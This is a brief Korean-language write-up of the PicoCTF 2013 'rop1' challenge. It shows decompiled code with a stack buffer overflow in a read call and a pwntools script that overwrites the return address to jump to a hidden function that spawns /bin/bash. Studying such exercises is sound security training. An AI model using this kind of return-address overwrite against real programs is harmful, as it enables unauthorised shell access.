Wargame & CTF/PicoCTF 2013
[PicoCTF 2013] rop1
cg10036
2019. 10. 8. 06:14
1 2 3 4 5 6 | int __cdecl main(int argc, const char **argv, const char **envp) { be_nice_to_people(); vulnerable_function(); return write(1, "Hello, World\n", 0xDu); } | cs |
1 2 3 4 5 6 | ssize_t vulnerable_function() { char buf; // [esp+10h] [ebp-88h] return read(0, &buf, 0x100u); } | cs |
1 2 3 4 | int not_called() { return system("/bin/bash"); } | cs |
vulnerable_function에서 buf 오버플로우가 난다. ret을 not_called로 덮어씌우면 된다.
ex.py
1 2 3 4 5 6 7 8 9 10 11 | from pwn import * e = ELF("./rop1") p = process("./rop1") payload = "" payload += "A"*(0x88+0x4) payload += p32(e.symbols["not_called"]) p.send(payload) p.interactive() | cs |